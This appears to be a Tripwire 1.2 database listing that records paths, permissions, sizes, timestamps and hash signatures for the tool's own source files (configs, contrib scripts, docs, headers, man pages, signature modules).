0UgVbgx7d8AFJfKsYgaiXsbBQbR 2poGG2MUnAJNG5UhtGAIfM 0 /tmp/genek/tripwire-1.2/configs/conf-sunos-4.0.h 0 00007R 100600 25416 1 856 856 912 0kOiuy 0iSmye 0kOiuy 0 3mRyE9PO2v6fEju5te5evY 2ps9EOhlLg4Bwr:6QVZkaI 1Spi7J 0003pG 1ttIaCZXhHkYTSBdnSmV7G 1KH.BcEz1a0sa5ao8zNacr 3bq0Opgyj6iQhWyivovhfC:paCR 1vdKUOiZ9a1UEDUr2v5BOC 0 /tmp/genek/tripwire-1.2/configs/conf-sunos-4.1.h 0 00007R 100600 25417 1 856 856 907 0kOiuy 0iSmyf 0kOiuy 0 04wR.UU4P5chQKo8lYaoMD 0JMaV7vK0uzTrMSMD1DOQ0 1tWI89 0008ZJ 2mk1kCwWiMms:uxK4msh6a 1521w5gcuz7BlG07xv6XiL 8B3OqnIQsKHPrII.m4PM2:IZiCR 23fUiLUepqjFk9fxHQ:lf5 0 /tmp/genek/tripwire-1.2/configs/conf-svr3.h 0 00007R 100600 25418 1 856 856 934 0kOiuy 0iSmyg 0kOiuy 0 0:DA9AkZvXNA2ufJ3ECG8: 33ERtI6.9GPkb1.nlnnkDe 0xcEZJ 0008DO 2VoTEUKA:pYf9WKrizYG9n 2mgF3P2PDKRpjH00pBxmmY DYmHk.HMT.kl9xndCwy66DThKTd 3ElCTY3VWaguTQQGINDkUX 0 /tmp/genek/tripwire-1.2/configs/conf-svr4.h 0 00007R 100600 25419 1 856 856 874 0kOiuz 0iSmyh 0kOiuz 0 1HMQlwkOqERaHkqPVvjZ.X 2SCnXaTXpiCxfRePb5C7Zu 3ogc7m 000Aa1 1q:pnl2NROV8:ACaKj2XQp 1sWqAxK6ZUBv1KVLeabP4o DWlMtKB4tzv:1jJP0eR4MRNlVwO 2QW1rq4FroOYc0u2AHmSBU 0 /tmp/genek/tripwire-1.2/configs/conf-umaxv.h 0 00007R 100600 25420 1 856 856 1098 0kOiuz 0i:vym 0kOiuz 0 3C1QUAC4G9c73zRRNYq0GC 137GGWkrz5LtpppkxSZaau 013nsa 000Cgr 0DDhz7yk6zQNq8NVyhvjeJ 39pCt6lUcD0I7qeTVcAn0r 0VPs665RhGVT1k4WNii.7ZHSRF2 3l5b7R9Ve.Jma2No09Zutd 0 /tmp/genek/tripwire-1.2/configs/conf-unicos.h 0 00007R 100600 25421 1 856 856 1032 0kOiuz 0iSmyj 0kOiuz 0 0rmsgxoKXCgd8WnQ4gwRQ4 1BfS5HQvZIFUELtq1JkfuT 084tCI 0007q7 3DyU88sSZKHMdnLqX2BcFS 3pTRSBflAGUxIByX5oROYb 5G5AAgMhN0L9Oq4Ye1lO:a.KeFu 0HvnygamBN:rUph6nxPx9W 0 /tmp/genek/tripwire-1.2/configs/conf-xenix.h 0 00007R 100600 25422 1 856 856 1070 0kOiuz 0iSmyk 0kOiuz 0 25vkUPl2g:fBnKjJ:DBdTp 3r2N5z8leZC34F7MTFN1sG 3y8hdW 000DtX 2QmznWgqBT1hLANZRYfFuJ 3RFRrtTlmXly1gnijHkBtr A0h58rtkYHR8Jpl5Lo9jWK0Ha3T 0Lis07kQ55eLTVJQdN4rhs 0 /tmp/genek/tripwire-1.2/configs/tw.conf.386bsd 0 00007R 100600 25423 1 856 856 3678 0kOiuz 0iy5v9 0kOiuz 0 2TcPxMgOIFP21iIuzgyOVA 0G:iqTvW66wiHOrOQR8OTz 07rufZ 0003x5 1lD.UutmtuhglXcOIAFofK 1jqeLHXiqPFfbrPZB:juAq 7nzPnCpqwnsiu:RF3T3b99fhYWq 1eVFNrqlaaMLUS3DNOWDbJ 0 /tmp/genek/tripwire-1.2/configs/tw.conf.apollo 0 00007R 100640 25424 1 856 856 5003 0kOiuz 0jQRWN 0kOiuz 0 29ZCtgH5p.EG7z7nFWJ34m 31trQkC8H51uhfkg8tVUNd 00MpfB 0002JX 19WnsY3aLQ.tY9:Gzu0nKv 27Z9MJ.8AVCL7YVd0pgysg DbWmUcvCQQwuI5gxevliG6E8pQW 2BuegOJN4Pp4R5sw8:V1RB 0 /tmp/genek/tripwire-1.2/configs/tw.conf.hp2 0 00007R 100600 25425 1 856 856 5475 0kOiuz 0iSmyl 0kOiuz 0 3N8U09eDu:bTghWSBKjbHO 3M8vKQORYXdJKOVYUsWJLS 2wp5Lv 0001hy 3ewiLbfZ7P1u.ZN0Q2L8Mk 0j8SBWNmpUrOjrVwAWiFnr 8ImDxKJyTLS1uktnuRlx00YDFhH 0RO1Brkfmf51cF9k51p9Ca 0 /tmp/genek/tripwire-1.2/configs/tw.conf.hpux 0 00007R 100600 25426 1 856 856 1836 0kOiuz 0iSmym 0kOiuz 0 1eczSe9YSkxvFam3:C0Vuj 18vLvlIX1w9ZRm0D6m1JA5 20bYfK 0001BT 1IpuiZMAQVdzkgY6jQlCkh 2wRkk0f4IYxlEUMnV2LuhT EFpwtv70VmrJJ2uw:Zst63qtwhv 3B8pmG5NTOdfNXn30UWrZu 0 /tmp/genek/tripwire-1.2/configs/tw.conf.irix 0 00007R 100600 25427 1 856 856 6331 0kOiu: 0kG6GH 0kOiu: 0 0lnBzYqNtyy3o5dlZTAr2X 2G2oRcqibwCam:L2iMNpc. 0f1EoW 0000:0 1OWjucEuoT9kjEUUtcFreT 1GdIlpXcnRCBeb.qYx582V 9ZUlxFOiM0WuW7CO8OFZqWesuWC 10i06BrA2j1mVOqIwbz1Hd 0 /tmp/genek/tripwire-1.2/configs/tw.conf.linux 0 00007R 100640 25428 1 856 856 309 0kOiu: 0jds1x 0kOiu: 0 2IeegJS.bBF3FAvM0bke:Z 37vBaHNjm.VR:2cTeIb4As 1LVGUZ 000CRr 1UiMHHU.kUD6Axd85oMKgc 3gHXTzHZVK7Cgzm6OP1.S4 AbY:2:ku1CfhSmd2ndqYCpP4WWm 1JqS4U9NpS0sHXodM.zR8A 0 /tmp/genek/tripwire-1.2/configs/tw.conf.next 0 00007R 100600 25429 1 856 856 2952 0kOiu: 0iSmyn 0kOiu: 0 1B8FUdtuno6R7qKinv3Evt 235NE1JJvZkW651L4NNeWD 2RGuy: 000DPG 0T7KsIfrbl5VwG6Ja4paI3 0PjTzlsiyF91YVtTPxENLY 86aNKPYau3tMW84RkKP1klsTSjY 1LnbZjVKtnO6WjMdyFYoLG 0 /tmp/genek/tripwire-1.2/configs/tw.conf.s5 0 00007R 100600 25430 1 856 856 4787 0kOiu: 0iSmyo 0kOiu: 0 1wJFYQMwbkMfXH6YDr66B2 1hrWea2V5nWQQzGtIEknw7 3qEbRa 0001uf 2O.LxYwuGUKJjLzAcj7qJG 3tLewdocDCWNLWqyc:ziIh 6:Zm3IA0AZBiB7xS.bMEvNcImK0 079AExv1KJKo.xYax3tvkT 0 /tmp/genek/tripwire-1.2/configs/tw.conf.sun 0 00007R 100600 25431 1 856 856 4483 0kOiu: 0j39g2 0kOiu: 0 3IVnG95tg7gPFmEB12vD9X 1qeKheqI5pVx8994YNdake 3Nb7D9 0005mP 2fMnOzjmyONLE.uIt5oymW 3kT0VTSBoLgNtaTEq5kkHK AcxH20WxA1as8WdiMWK9LrP.oOT 0LoACwSFp::vJDMwyYjkKy 0 /tmp/genek/tripwire-1.2/configs/tw.conf.sun.old 0 00007R 100600 25432 1 856 856 5359 0kOiu: 0i:vyn 0kOiu: 0 10wQz3jvJFPertcFQBAEjG 0soAHJYpU7xg7lN9lb93LA 1GOpWn 000ATF 3pqj5vQvgdmUh3plQyWV1. 1IABFDGysZMUk:Nv6mh5xS EFHBfSiYYLQgK202nndyO4CSRDR 2e4hpe786dVx84bx.4LqJ5 0 /tmp/genek/tripwire-1.2/configs/tw.conf.sunos5 0 00007R 100600 25433 1 856 856 5151 0kOiu: 0iSmyq 0kOiu: 0 33FWGjowTLQTrSMXvnLuzf 2iIKlvp1P2wGQbYsb8wLpk 0RjCBs 000DHS 2bW1eLk6GJ3rawy.NkASIx 22wkRVPFNrhzeQxU1Iejww 6v70YYp8g9NyUS3kQ3FSjmPCwL0 0LIEiP.wbTUoqi5:JTvAX9 0 /tmp/genek/tripwire-1.2/configs/tw.conf.ultrix 0 00007R 100600 25434 1 856 856 1352 0kOiu: 0iy5vA 0kOiu: 0 0ZoTP0ndyJ2AMeH7OSzSto 2nh5P9NQ.exaP:o6Z4JKsC 3t0jRu 0008Dn 0h3MvaZKb15lGezbYTqgkH 0MWPk7RkIi8yftn3lnbOch 1.2UFgWNzVnxtUDvRBZWlcjagmV 3hMWIWa8xXXQTkECabYiij 0 /tmp/genek/tripwire-1.2/contrib 0 00007R 40740 27693 2 856 856 512 0kOivL 0kOiuN 0kOiv1 0 0 0 0 0 0 0 0 0 0 /tmp/genek/tripwire-1.2/contrib/CheckConfig 0 00007R 100700 27695 1 856 856 618 0kOiu. 0h4KJb 0kOiu. 0 10RF2YnvAhKKxuWjU6b3Yf 1wloxZRW07PD:Kjn6HXaqy 1pVDDr 000Bcc 0XisyjeTuUg:g1qr1inXf8 3d5hMUzYTjBRbUN4XUaNJp Aso8s8edZtJy4qJpqoO.rB0DcuE 0Ywr0XHb6JWhJOszMFbtEk 0 /tmp/genek/tripwire-1.2/contrib/README.ASET 0 00007R 100600 27696 1 856 856 27318 0kOiu. 0j2F2R 0kOiu. 0 2Caw161MqbozX5CAWgTQe7 1gn:JQSXkjCflvmtYuiIlo 2zyeJH 000CLt 0JeoT55ZUTlSZTj0Zyl.jw 1q5RO1hT0mCDM05POD0viX 3T3mJ3T6ShApvOsHWHG:hQgRL8Y 2VZ9sRXyM.drppMBHGuRPS 0 /tmp/genek/tripwire-1.2/contrib/README.CheckConfig 0 00007R 100600 27697 1 856 856 1216 0kOiu. 0j2dOg 0kOiu. 0 2RrqoiNx05nAT1:JYhR4pq 3LsZehz8LIBcjmC8i3sEAG 2ctVd6 0008V. 2vrftluxp5TUmBWEN4Fi6d 3ieMHRoSmtpCUQN0UZneRI DuwvMh9xPlxG7ZPsArbcHRn7500 26m3qXeXWUsPO49GTwSnVA 0 /tmp/genek/tripwire-1.2/contrib/README.TRIPWIRE 0 00007R 100600 27698 1 856 856 3136 0kOiu. 0h4KJb 0kOiu. 0 10wg2R..T:FgJqUa443b2l 0OCcb7I0HvrOOs42ywbvw8 0cGfQy 00020q 3Qxar0TctuFCZMOCVTFGvz 1uu4XcLOVzzK6LmiXd1shR 9xbjVsxlo7qEzfHjatsdg7MmosC 0Yp5v5aQzP5TAGG4DkWbl1 0 /tmp/genek/tripwire-1.2/contrib/README.cdf 0 00007R 100600 27699 1 856 856 8329 0kOiu. 0jds1z 0kOiu. 0 0LEbUVtOF9ctsFZnHmIIdY 2JZMGP8Vgct:db7ixu1WWX 3UCK.Y 000Fnj 0gOZhE35Z8b20ojZttGcXK 1FUBQx9dlJ.xufhE5LJ33a 3yYWVf9LTGSFhXotWrA6DSjBDie 0WMP7H2SnkTWQlFZa7ZARF 0 /tmp/genek/tripwire-1.2/contrib/README.chk 0 00007R 100600 27700 1 856 856 620 0kOiu. 0iSmyx 0kOiu. 0 2fNxrN205BOq6Li4V:dzBK 3:nEehjivuQr3YgSaKS174 03vuPw 0007cK 2KNQjDZioHdIMRxVM9VqBo 2gEyLNuKJRBdF.4EXNGh98 BzE4M4.6JLAXWlIH.FVpiKcxhA7 3O0vcz0v6oelD0RNzcFRnj 0 /tmp/genek/tripwire-1.2/contrib/README.hpux 0 00007R 100600 27701 1 856 856 3504 0kOiv0 0jQlLR 0kOiv0 0 0n4Wi73U.Qo56.3FvqkWRD 2JlMQf7KEcwmQ734bnRK0C 0RBYqX 000CXa 3RpOiizUl0dbPQUKHPUzmJ 22cFPP:5jcqg0SOTLjF6ev EoJa2Gxcax:86g61.9k8ELkruK2 3V5LWYE45AwXyw3KjUgBnO 0 /tmp/genek/tripwire-1.2/contrib/README.linux 0 00007R 100600 27702 1 856 856 5015 0kOiv0 0jQRWQ 0kOiv0 0 0KwVesLnIl:daeOX5ihrhS 2E:VTsMvmbfyQqZ5eIikX8 3D7juG 000DQW 32Iq04.OM.lJ4LeQWe79jc 0d.zCFFBDLLSrEISpJVLSt BYK8woiyF2GU0gh9zxac6nRgnCU 12i5OcrxQmB:2eoSJl36:8 0 /tmp/genek/tripwire-1.2/contrib/README.zcatcrypt 0 00007R 100640 27703 1 856 856 225 0kOiv0 0iYGgn 0kOiv0 0 3sbFV1OYaUlr4XShCUCa2G 3.jhNaevTnpLANaQz.ZXA2 1qpW1r 0008TS 0BHjd3KprVBZvv.KzyUm.N 3agWW53eJSnGIAQl9u9ujk 9mcamns5sdxOd7RZep1lZ9qCnk5 3RtfaBrKSaSUOPcyW3JZFM 0 /tmp/genek/tripwire-1.2/contrib/TRIPWIRE 0 00007R 100700 27704 1 856 856 569 0kOiv0 0h4KJb 0kOiv0 0 3OTinLpnzpCbJE5C8Wr8:K 1MiNqXck3W0G:iFMEFT0N5 1VGJAT 0002BO 0n16al4k4DC3kNMKHfMIE6 3rm26clf1OdE1F8AqVwk1: 6aZTQE.SooT.U9Zc66gw9rlYsb. 3sFbdeHk3EB2NOsfFEqU9k 0 /tmp/genek/tripwire-1.2/contrib/encore.malloc 0 00007R 100600 27705 1 856 856 24524 0kOiv0 0i:vyp 0kOiv0 0 0gJrF5bhwv36cNwwWSW4EQ 3Q3arijWWukbyncohH20yi 2U0OHB 0001vW 2e:W2Xj5T:6JCjfEh2gb7H 0.6EH0L65uWdMsgOCYFLtD 64DOVf24cO2LS.erUgFIabe1ktH 306I7f2D3AX3D3pEJcbQ9Z 0 /tmp/genek/tripwire-1.2/contrib/md4convert.sh 0 00007R 100700 27706 1 856 856 2262 0kOiv0 0iy6Vx 0kOiv0 0 3yB.NsHFFy0xUci.cai5oj 1tJPzfUT6kOndbCC4L8.Gh 1F9zwV 0006Xw 2oN4FrW9lB9qJ.n9HdaOte 0TI927:fN44xAUxqTN3.IQ 2Swyu72gN9bEtb4Nx5NdBV5fkNI 3lUme:ygner:OO9SIxXRxr 0 /tmp/genek/tripwire-1.2/contrib/tripwire.chk 0 00007R 100700 27707 1 856 856 456 0kOiv0 0iSmyy 0kOiv0 0 1q8KeYjgCBhWbvq4q1PBPT 0N6MWV.Unk5WHoBbWObjog 3l:44. 0007gn 20hojWd4TfynplmAfGJoNL 1iBoqABjzyLv7XNqVM50JT 1LH4j5f9Csj78mPsBrupoFWvmy9 2Ye1XhtVxMT2x7U08XHloZ 0 /tmp/genek/tripwire-1.2/contrib/twdb_newinode.pl 0 00007R 100640 27708 1 856 856 1910 0kOiv0 0kNQPX 0kOiv0 0 11f3RyHbd6IadYPp4EpDz5 2BixjqWV.ZFIA1pmQZ04RE 1GHMeW 000DEm 2YVzaMA7:ia0K9EU0xLAXV 16WGSh7ihuEujjqvh7GTtV 3mtEyhWZGIdDiVKQS4o6PHesIIA 1g9zUDpgTkpHnZfXQXGufM 0 /tmp/genek/tripwire-1.2/contrib/zcatcrypt 0 00007R 100640 27709 1 856 856 316 0kOiv1 0iYGgo 0kOiv1 0 1iKFIf:iBsZLOiL.iI41Oy 2VHNHFRcOBgyKJNbLEvqOE 1MHVyq 0001Xf 0Z6i7SKlsCgR:0060mpD9Q 0hvh9Gje6SBMibJr0SJ4qJ 9mWzUrndxVWD8DWkWG25xNSAngI 3pt5FaYYw3PL89B70qeFVD 0 /tmp/genek/tripwire-1.2/docs 0 00007R 40740 36123 2 856 856 512 0kOivL 0kOiuO 0kOiv2 0 0 0 0 0 0 0 0 0 0 /tmp/genek/tripwire-1.2/docs/README 0 00007R 100640 36124 1 856 856 858 0kOiv1 0j2dgA 0kOiv1 0 0Jj5OlT66uog5MQKM5Rbvt 19R5RMDHG1sWe3m0S8RCiW 2R6wC6 000DFH 0hiSwDV:tVVYUlMwjvvBQQ 00BohZ44x:CVb5uXUM.Hgb 3JFTrqbkvX0l1nY9uruAfSfjIt2 2.wu7kX5ciy6lWgaPgsxc. 0 /tmp/genek/tripwire-1.2/docs/appdev.txt 0 00007R 100640 36125 1 856 856 1281 0kOiv1 0kBSkM 0kOiv1 0 2LSDoa2d.jP0vkFOplPf74 28FOn8RqaJi3wEqLAmXbB2 0SwkAA 0005l7 322sVbEIGk4SCAfVSKKRAA 1h.A1rxTYi7dClAZNva:M4 0QBpdg3C3Q0o4:x8hZncrLycYjs 34IcaV0G2Z1u7b5xma8FNf 0 /tmp/genek/tripwire-1.2/docs/designdoc.ps 0 00007R 100600 36126 1 856 856 105842 0kOiv2 0kOir2 0kOiv2 0 2a7Ih7cx3oo.tsHQHL.NBY 2MXFzAln7zZGMluETa9wok 1WMKha 0009:3 1RAO6MRvHInPSOYSv0i.Kc 1zUpTVnDMuSd1E06PzltX8 BgF3Q7R5hYoMEvD8pbicle8TZRD 0nWyXy1d2IHGtLkkTSgkvN 0 /tmp/genek/tripwire-1.2/docs/sans.txt 0 00007R 100640 36128 1 856 856 911 0kOiv2 0kBSkN 0kOiv2 0 2ooVWvd4gSyctemZ1fz:.D 2i7MDN3KxnhBuXvDr8gN68 3dlFaW 000B5G 0Q7EKH9YQj7jtzRl803LCs 2S3IIIDWagcYt7VRcpfHn0 43KKpS6jXIOb7ZPfDAxkwNwXBMj 23hmfD:4lJ0ah1MW6HT5hM 0 /tmp/genek/tripwire-1.2/include 0 00007R 40740 59 2 856 856 512 0kOivL 0kOiuO 0kOiv3 0 0 0 0 0 0 0 0 0 0 /tmp/genek/tripwire-1.2/include/config.h 0 00007R 100600 60 1 856 856 5051 0kOiv2 0k9cpS 0kOiv2 0 0vT2DM4d7sodFb1D1C:5K9 1Qn:u0brFXc04hWJ:aI3i6 2DhHlb 000CN2 1qr2.DVYzPVLeMtkOtC2E5 2WUa2SUxFcj:gIwX4MwK4X 0El77Fe7PWRgqQTmmT:SjilXPL0 2rpAqDLO.IEAInRL9MhGgS 0 /tmp/genek/tripwire-1.2/include/list.h 0 00007R 100600 61 1 856 856 1840 0kOiv2 0k9cpT 0kOiv2 0 1YMdfckJEuMJewrLKFL0L7 0AfW1rYrKYnjZDJaK9eXE2 3fdto: 000BpV 3VY5:MUjI44PdUwTFsu9VT 12wnqAL8oQxK.4LWUBeWfQ 8PpT6.f1OgRcxhbZWiuqWEm:ERW 3WtEpMgXeQMeGF.AowvcJh 0 /tmp/genek/tripwire-1.2/include/patchlevel.h 0 00007R 100600 62 1 856 856 84 0kOiv2 0jdq.f 0kOiv2 0 0nAbG92q1zhISFea3rnYr8 1yjsDdW:hvY8uXagILDbAO 1Gbolk 000EXd 2pl7l.KhV9YSNgVXhlYPYi 3Lt.mvDO0ihSdDaGYecUga ANSc6iHi5Q2Nc8GMfKW8u1gA160 1ntARrVI2jWIPVJcO:NYcg 0 /tmp/genek/tripwire-1.2/include/sigs.h 0 00007R 100600 64 1 856 856 612 0kOiv2 0j3q0w 0kOiv2 0 3sNHdz:IavClGuwcTv4YZl 38XhBH5b6BR7QJ8W:wAAOU 32cYbl 0000cp 3dpWDYUMbuzKJEwiyJzmmG 1:wpiSThh2mrfYZ0uxduzb 8oVYp4eYquxF6WMiTkGU.Cq9.Ki 0b3zf.7ZNgGl8euQFIiNMD 0 /tmp/genek/tripwire-1.2/include/tripwire.h 0 00007R 100600 65 1 856 856 8476 0kOiv3 0kC:AI 0kOiv3 0 0Rb2SDdPqGZCHD21C9.ZUd 2TaliFBmBaLTD..EPmROF0 3ZCKA: 0005kW 05rB9kr7v1L7i2luzzD7wJ 2.doLl7uwbUMUiyscNbVoR BAJIXjQn1B8fqFHdNMCpaIoy50c 266xg3v103M3TuGI:Os4By 0 /tmp/genek/tripwire-1.2/lib 0 00007R 40740 2339 2 856 856 512 0kOivL 0kOiuP 0kOiv3 0 0 0 0 0 0 0 0 0 0 /tmp/genek/tripwire-1.2/lib/tw.config 0 00007R 100600 2340 1 856 856 4232 0kOiv3 0iy5vE 0kOiv3 0 0HcduXYrGJDXIvL2jKnlaS 2nUmmAk9WZXJj0ZK4JPfEa 3Cor1B 000FGu 0FW6PM24nguxmf:YrHaIDt 174SledeRQ50TTEATIQpUH FyEYpgQ:FSp2OUYyp:2MirIDZtV 0GeAbaP:MOXb9XFkcsIC0c 0 /tmp/genek/tripwire-1.2/man 0 00007R 40740 3097 2 856 856 512 0kOivL 0kOiuR 0kOiv4 0 0 0 0 0 0 0 0 0 0 /tmp/genek/tripwire-1.2/man/Makefile 0 00007R 100600 3098 1 856 856 312 0kOiv3 0kC:AL 0kOiv3 0 2GsoEfC91jL9p473Sggl.: 3CnugW.rE2aLJUsWbj.:CY 2:IauJ 0007qm 2QPUf5qKGbjq6SuazBv2:d 3fL2q3dY0sSX31ViJ75ZFK Fns873F8LbbifHLVKyxJxS0y4Hp 2EGzshcLW.ys0vROrhwdI8 0 /tmp/genek/tripwire-1.2/man/sigfetch.8 0 00007R 100600 3099 1 856 856 148 0kOiv3 0j2F2X 0kOiv3 0 3s0gvE4ff9feUs9srKWVx2 12CWtbT5ZeDyPup8dD2:AY 1uRPyb 000AeX 0BxFMhnuKrBdhAtf02GPy7 3kSNOricY1o0pWzxXX6pGO 1MsprIgRon:8uFHHTWTff2gkN66 3ruKuQxQ5PbgzyPwSvVlLc 0 /tmp/genek/tripwire-1.2/man/siggen.8 0 00007R 100600 3103 1 856 856 1681 0kOiv3 0kCzvE 0kOiv3 0 0EUiHsDRgF259Trmqttldn 0Qvf8qlTpd6YGaxnJ.Xq8b 2YAFNh 00020Q 0Hnnk3dfZVP0ThYcRTR7wx 04FSWnU2H3eQ1N63KFt1Rh 4uOP:97xyqxlnQs:3xNCBY57nIb 32aCKsf27p9LFgxAbPml.w 0 /tmp/genek/tripwire-1.2/man/tripwire.8 0 00007R 100600 3104 1 856 856 13378 0kOiv4 0kBSV3 0kOiv4 0 1jcSJXYIrdngjxDtDgzhb4 2UD1vcOMQ1L0UYdPauGj3d 2FYVBb 0007PO 1dEM4WeBZC:rDUppBDmNwz 1hE1zhdImqkjydcEGBu8Hm 9JqhgF4WROdR8bSoFXO3yZ7p5in 3lf6YcXDzMNTjlAts83xe0 0 /tmp/genek/tripwire-1.2/man/tw.config.5 0 00007R 100600 3105 1 856 856 9866 0kOiv4 0kCzvG 0kOiv4 0 1XRHJDO1Iq.Uxuw41tE8IK 1SG7yc.tqPkjZjmOVaocZZ 3g9VK3 0003d7 3OmWI6MPYvELp5Ks2zYdg1 3JXJ24wwxJLvdCOeF0uzkt FXMfxPFfG5J30daWZYqwRFw9k6a 0I9N3y8T7RhCm5ocYwiqjx 0 /tmp/genek/tripwire-1.2/man/twconvert.8 0 00007R 100600 3106 1 856 856 959 0kOiv4 0jds27 0kOiv4 0 09SNq7tN.mczzrsRSJfORm 3GRRKno.n6KDP3Nj1MVk3h 2HNYW6 0001Wt 2c3fh52dj03j.SvdI3KIB8 3B:h9ai4453SoSYF.LGVLP 12yi0S.EGfTrFWUvzW5uE6YQ7xv 3hdhDO5uhFFmRK7E446yQ8 0 /tmp/genek/tripwire-1.2/sigs 0 00007R 40740 4706 10 856 856 512 0kOivL 0kOiuR 0kOivC 0 0 0 0 0 0 0 0 0 0 /tmp/genek/tripwire-1.2/sigs/crc 0 00007R 40740 6954 2 856 856 512 0kOivL 0kOiuR 0kOiv5 0 0 0 0 0 0 0 0 0 0 /tmp/genek/tripwire-1.2/sigs/crc/Makefile 0 00007R 100600 6960 1 856 856 242 0kOiv4 0iy5vI 0kOiv4 0 0sO:nqsDjwTDpPgdK.WuXG 27NwtC1apPtfHzWO0vzkFH 2m0VaH 0004AX 34P.:Jp1wkBkIn7hJRAVZA 3vWEUKAYQw:iltUKJEG5U: 9IVzIUUp0dY4cycIxdMlGhMD5QB 1hys0YYvI9TNWjuOAo:1Lk 0 /tmp/genek/tripwire-1.2/sigs/crc/crc.c 0 00007R 100600 6961 1 856 856 6607 0kOiv4 0kCzvJ 0kOiv4 0 2ERp57qjFDbblAH4Ahbksd 3vPkajsCuwtop3mpaWupe6 0IVcqA 000F7J 1.pkbNfeBDcgiDfEbpUjbI 0ytKB6qSDYdmgwfmQvkF5s 57JyUvqYPQewaM9BOQFB1NEv8A0 3Aga73n79sCYRquPgFSfuA 0 /tmp/genek/tripwire-1.2/sigs/crc/crc.h 0 00007R 100600 6962 1 856 856 75 0kOiv5 0iSmzG 0kOiv5 0 2sc6rl8IReHAQnvbYE5we. 1nNiSIih.BRJlEfjIUiSOi 1RisQ1 00062h 0cXDv14MGoSu8MJYxSxev7 2Y9g2.DfAtvLh2xRj8RV5c 4LJ4SyAYlbqPrZzykwxhsg3WMAF 37lF25BySrEiDa2RlLtDDn 0 /tmp/genek/tripwire-1.2/sigs/crc32 0 00007R 40740 8502 2 856 856 512 0kOivM 0kOiuS 0kOiv5 0 0 0 0 0 0 0 0 0 0 /tmp/genek/tripwire-1.2/sigs/crc32/Makefile 0 00007R 100600 8503 1 856 856 245 0kOiv5 0j2:bM 0kOiv5 0 0N27FYkE7H.rhyyP.CNHAZ 0H7QBosGw3XCF7PFIrQXXo 3Pkm5k 0001BE 3BrUNUJggnbxqteRLoBwkA 0XaKN0poIgyCqtZdSMk71D 7p6HdJucYDTqtsSjRs91wDCpqc0 3cN.ruoYIDdR:67yOlxtZA 0 /tmp/genek/tripwire-1.2/sigs/crc32/crc32.c 0 00007R 100600 8504 1 856 856 6982 0kOiv5 0kCzvL 0kOiv5 0 0xE7ds2CsIyBvQN4W5f:T4 0Onc5B8OOusnP71gd9LmGi 164eak 000CNN 2z1KI5MytcZgUuKncigQyF 2FtMrnbCMOoBmUmBEBXDLi 4DsYnHGZLJ3Q9:LeVgGPHgIu0rq 0IdRDvB9wGuyuv.ovUBTSZ 0 /tmp/genek/tripwire-1.2/sigs/crc32/crc32.h 0 00007R 100600 8505 1 856 856 79 0kOiv5 0iSmzL 0kOiv5 0 0ynHKVaYSFnXtqSxhs8.9Z 3D6p0H3grbhHVynFmLNwcU 1N0LDx 0000vI 07qvhscfdly0qRFScZHNbI 1vCnIeeqxw3peamPaZc5Xx 2OreCEYlKL9nW4y8hmRyryy.aur 36VpkKPweloghgAcj.jWA3 0 /tmp/genek/tripwire-1.2/sigs/haval 0 00007R 40740 10805 2 856 856 512 0kOivM 0kOiuS 0kOiv6 0 0 0 0 0 0 0 0 0 0 /tmp/genek/tripwire-1.2/sigs/haval/Makefile 0 00007R 100600 10806 1 856 856 321 0kOiv5 0k9cph 0kOiv5 0 1era4.NocXX8h9PLoiVYSY 2WmZTNqcoabzdorCAP9vUP 21gZbM 0002a2 3lJsmpDKp4RJaoz.f08gNn 2:JBdhrjVasuNNDbX:Ea7: 9sasHaiL7hn7cCtdWGG8JD:5LcU 1fNYXYEfZwlfk:kQFZ7azU 0 /tmp/genek/tripwire-1.2/sigs/haval/haval.c 0 00007R 100640 10807 1 856 856 27505 0kOiv5 0kCzvN 0kOiv5 0 0DAAd8qGEr7exr:j3otY0l 0UdKwg4CPexVexwddnmrJh 07Hpac 0009zj 0lYgjHXvge:q.Vch1UqDbi 3.HEwtR8Myc1eNEoDs154z 5orK84hdyIivbuCdVfz0yVSiz8P 3nUi7JY.Xs55QL:J26u1qs 0 /tmp/genek/tripwire-1.2/sigs/haval/haval.cert 0 00007R 100640 10808 1 856 856 702 0kOiv6 0k9cpk 0kOiv6 0 0uwCEV9E7TxdIthMJt2d3G 15QPCIljTCb1iQ.20mWNVQ 3wcgDu 000BWG 2N3K3jETojdnhPfWUe5S5d 1QIHeAileoeOMKChWTzAfT FTEVOERCRPC0gCnIEdCCUEO9EDl 146Z3.v.mwtx4qAm4MGge8 0 /tmp/genek/tripwire-1.2/sigs/haval/haval.h 0 00007R 100640 10811 1 856 856 2448 0kOiv6 0k9cpl 0kOiv6 0 1zlnvZWDlae1gdqbqjSv9Q 3:q:RBKlgBX2tNqvuthJ8i 2cx4j: 0000Z9 1IRGNxsV63y7ze5IjfY:aC 3Ud0xVDHC:BhMIWVNNEimg Ez5GqYtKCXKXGyPr2vd8zciS6ns 2WKELyIuvCLdJ0KThlonID 0 /tmp/genek/tripwire-1.2/sigs/haval/havalapp.h 0 00007R 100640 10813 1 856 856 1048 0kOiv6 0kG6GP 0kOiv6 0 2f7FT3j642vAtRH0fYqhdk 2dQiZOXAeg1oedTl5WpPEB 279oN2 0002:j 3gKfkp:OI::69UrUg4Rmz7 11YMM4gnlaHSKWqf.n0Xt8 7abbDPL0CXrJbsILWM:yZARZ.Z2 2nRlY5SNK:ASdoI3iRVnrJ 0 /tmp/genek/tripwire-1.2/sigs/haval/havaltest.c 0 00007R 100640 10814 1 856 856 6632 0kOiv6 0kG6GR 0kOiv6 0 0T.8StLmSXk8hR7woZye:n 1fRziWdPz1XOrnak7JcHeJ 097d3b 0009SX 21FofAcEYj.rSFdncgYIib 03oa2SP.2vTvcSw6pV8ZUe 15p5z0Toy2Ww0h8RP7Ub3Srs.KP 1oTDdgarRa:uWct7tmD1:d 0 /tmp/genek/tripwire-1.2/sigs/haval/havalwrapper.c 0 00007R 100640 10815 1 856 856 1852 0kOiv6 0kCzvR 0kOiv6 0 1.izhBVZ0wA46WwxsxtfsI 3s:JzvDFObMtG2SPtIckhV 2l70.o 000F8S 0AhunP7e07A6z:V2Qo.TUi 2xz.d0cwQDM2FtY.GJZxkf 3PV76lN5gSSObCdqxooEDBi0imL 1yGV.gwM8AdbAebqDQATcU 0 /tmp/genek/tripwire-1.2/sigs/md2 0 00007R 40740 15378 2 856 856 512 0kOivM 0kOiuS 0kOiv7 0 0 0 0 0 0 0 0 0 0 /tmp/genek/tripwire-1.2/sigs/md2/Makefile 0 00007R 100600 15387 1 856 856 293 0kOiv6 0iy5vM 0kOiv6 0 1.zCsZMXIfyCFDwkfKdBtB 30XCMKX:iBlatHC2BaKbUh 2spuM1 000Ed4 1CyzOSdT.zJbcwfnaGPTwq 